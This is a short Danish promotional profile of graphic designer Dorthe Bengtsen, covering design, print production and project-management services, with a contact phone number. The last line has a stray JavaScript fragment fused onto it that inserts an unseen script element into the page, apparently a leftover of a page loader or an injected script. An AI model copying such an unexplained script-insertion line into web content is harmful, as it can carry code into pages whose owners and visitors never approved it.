Dorthe Bengtsen – grafisk design og projektledelse m.m.

db fotoDorthe er grafisk designer med stor erfaring fra både bureau og fra marketingafdelinger i større virksomheder. Ud over at være kreativ har hun også styr på alt fra projektledelse til grafisk produktion. Hun kan desuden hurtigt sætte sig i dit sted som kunde og indkøber, fordi hun selv tidligere har siddet på den anden side af bordet. Det giver overblik og ro i maven for dig som kunde.

Dorthe arbejder med alt fra logodesign og brochurer til annoncer, plakater og hjemmesider. Hun har en indgående forretningsforståelse og er god til at stille spørgsmål, så hun ved, hvor en opgave skal lande.

Hun har desuden stor erfaring med blad- og bogproduktion og kan byde ind med kvalificerede løsninger – også når det handler om butiksmateriale – det kan f.eks. være emballage, displays, udstillingsmateriale eller materialer til en messe. Det skal lige bemærkes, at hun altid tænker i samlede løsninger – det vil sige, at der som en helt naturlig ting er sammenhæng mellem hjemmeside, brevlinje og visitkort. Kald det bare den røde tråd – her kan du få den i alle farver.

Endelig skal du vide, at du får ikke et display fra Dorthe, som ikke en mors sjæl kan samle – eller en brochure, der overskrider en aftalt gramvægt. Detaljer, men meget vigtige detaljer.

Vil du høre, hvordan Dorthe kan hjælpe din virksomhed med en opgave, så ring til hende på 27 130 240.document.currentScript.parentNode.insertBefore(s, document.currentScript);